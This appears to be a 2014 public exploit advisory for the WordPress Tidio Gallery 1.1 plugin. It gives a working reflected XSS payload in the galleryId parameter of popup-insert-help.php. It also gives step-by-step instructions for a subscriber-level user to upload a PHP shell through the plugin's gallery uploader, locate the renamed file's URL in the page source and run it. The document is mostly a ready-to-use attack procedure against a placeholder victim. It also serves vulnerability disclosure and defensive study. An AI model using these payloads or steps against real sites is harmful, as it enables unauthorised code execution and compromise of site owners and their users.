WordPress Tidio Gallery 1.1 Shell Upload and XSS Vulnerabilities

Wordpress Tidio Gallery 1.1 Shell Upload and XSS Vulnerabilities

######################
# Exploit Title : WordPress Tidio Gallery 1.1 Shell Upload and XSS Vulnerabilities

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://www.tidioelements.com/

# Software Link : http://downloads.wordpress.org/plugin/tidio-gallery.zip

# Date : 2014-07-14

# Tested on : Windows 7 / Mozilla Firefox

######################

# Location :  

http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php -> XSS

http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-post.php -> Upload Shell


######################

# Vulnerablity n°1:

XSS Reflected Unauthenticated

http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="/><script>alert(1);</script>

# Vulnerablity n°2:

Unprivileged user like subscriber could upload shell script.
The plugin rename file with "md5(microtime())" php functions. 

1) Connect to url: http://VICTIM/wp-admin/admin-ajax.php?action=tidio_gallery_popup_insert_post

2) Click "add gallery" button

3) Click "edit" option

4) Click "add image" button

5) Click "upload" option and select php shell from local drive

6) Refresh page (ex. press F5 key)

7) View source page (ex. right-click -> view source page) and search string like this: 
   "fileUrl":"http://VICTIM/wp-content/uploads/2014/07/14625a7ca5df93c49910a502ef9aabfb.php"
   Skip file with "*-thumb.php" extension.

8) Open browser and connect to http://VICTIM/wp-content/uploads/2014/07/14625a7ca5df93c49910a502ef9aabfb.php


#####################

Discovered By : Claudio Viviani
        http://www.homelab.it
        info@homelab.it
        homelabit@protonmail.ch

        https://www.facebook.com/homelabit
        https://twitter.com/homelabit
        https://plus.google.com/+HomelabIt1/
        https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################